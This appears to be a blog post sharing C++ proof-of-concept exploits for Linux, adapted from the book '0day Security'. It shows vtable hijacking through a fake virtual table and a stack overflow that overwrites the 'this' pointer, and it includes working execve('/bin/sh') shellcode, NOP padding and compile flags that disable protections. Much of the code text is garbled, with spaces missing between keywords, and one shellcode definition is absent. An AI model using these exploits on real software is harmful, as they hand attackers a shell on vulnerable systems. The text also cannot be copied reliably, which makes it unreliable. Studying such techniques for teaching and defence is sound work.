classtest { public: voidset(int m, int n){ a = m; b = n; } virtualvoidshow1(){ cout << "virtual function1\n"; } virtualvoidshow2(){ cout << "virtual function2\n"; } private: int a,b; };
/** * file: V_table.cpp * g++ -z execstack -o Vtable V_table.cpp * * The general idea is as follows: * 1. add the fake vtable which contains our shellcode's address to the end of shellcode * 2. make the ptr of vtable point to the fake vtable * 3. call the virtual fuc to execute our shellcode * * Before starting, I try to rewrite the vtable derectly in code, but soon I found that we have no permision to rewrite the vtable, * because the vtable are loacted on .text section, it's means this area only can be readed and executed, and it's should be noticed. * * The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology", * and the original author's code is feasible under windows, here I am modified to apply to linux. * * the code executed successfully on ubuntu 16.04 LTS **/
// define a class which contains virtual functions classFailwest { public: char buf[200]; virtualvoidtest(void) { cout<<"This is a virtual function!"<<endl; } }; Failwest overflow, *p;
intmain(void) { char * p_vtable; p_vtable=overflow.buf-8;//point to virtual table // p_vtable = overflow //reset fake virtual table to 0x00601268 p_vtable[0]=0x68; p_vtable[1]=0x12; p_vtable[2]=0x60; p_vtable[3]=0x00; memcpy(overflow.buf,shellcode,0x24);//set fake virtual function pointer in shellcode // actually, 0x0x00601268 is just locate in the end of shellcode, // in other words, we fake a virtual table at the end of shellcode which only contain one virtual func pointer // and the only one was point to our shellcode p=&overflow; // call the virtual function to trigger the shellcode p->test(); return0; }
/** * file: pass-canary.cpp * g++ -m32 -z execstack -o pass-canary pass-canary.cpp * * The general idea is as follows: * 1. overflow on stack and rewrite the pointer(*this) transfer to func's argument to a fake virtual table * 2. make the fake virtual table's first item to point to our shellcode * 3. call the virtual fuc to execute our shellcode * notice: we made the fake virtual table as the shellcode's head, so just overwrite the "*this" on stack to point to shellcode's address * * The idea of this code comes from the book "0day Security: Software Vulnerability Analysis Technology", * and the original author code is feasible under windows, here I am modified to apply to linux. * * the code executed successfully on ubuntu 16.04 LTS **/
#include<cstring>
// shellcode's addr: 0x804a040 char shellcode[]="\x44\xa0\x04\x08" "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" /** * xor ecx, ecx * mul ecx * mov al, 0Bh * push ecx * push 68732F2Fh * push 6E69622Fh * mov ebx, esp * int 80h **/ // padding "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x40\xa0\x04\x08"; // set the vtable pointer to point shellcode's header
classVirtual { public : voidfunc(char * src) { char buf[100]; strcpy(buf, src); bar(); // virtual function call } virtualvoidbar() { // empty function, just for define a virtual function } };
You are welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them.